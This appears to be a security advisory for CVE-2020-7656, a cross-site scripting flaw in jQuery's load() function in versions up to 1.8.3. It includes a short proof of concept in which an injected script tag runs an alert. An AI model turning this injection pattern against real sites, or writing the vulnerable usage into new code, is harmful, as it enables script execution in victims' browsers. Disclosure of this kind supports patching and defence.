Cross-site scripting in jQuery



Published: 2020-05-25
Risk Medium
Patch available YES
Number of vulnerabilities 1
CVE-ID CVE-2020-7656
CWE-ID CWE-79
Exploitation vector Network
Public exploit Public exploit code for vulnerability #1 is available.
Vulnerable software
Subscribe 		jQuery
Web applications / JS libraries

Vendor The jQuery Team

Security Bulletin

This security bulletin contains one medium risk vulnerability.

1) Cross-site scripting

EUVDB-ID: #VU28228

Risk: Medium

CVSSv3.1:

CVE-ID: CVE-2020-7656

CWE-ID:

Exploit availability:

Description

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data within the load() function. A remote attacker can pass specially crafted HTML code to the application and execute it in browser in security context of the affected website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

PoC:

index.html:

<html>
<head>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>
<body>
    <div id="mydiv"></div>
    <script>
        $("#mydiv").load('inject.html #himom');
    </script>
</body>
</html>

inject.html:

<div id="himom"><script>alert('Arbitrary Code Execution');</script ></div>

Mitigation

Install update from vendor's website.

Vulnerable software versions

jQuery: 1.0 - 1.8.3

Fixed software versions

CPE2.3 External links

http://github.com/jquery/jquery/blob/9e6393b0bcb52b15313f88141d0bd7dd54227426/src/ajax.js#L203
http://snyk.io/vuln/SNYK-JS-JQUERY-569619


Q & A

Can this vulnerability be exploited remotely?

Is there known malware, which exploits this vulnerability?



###SIDEBAR###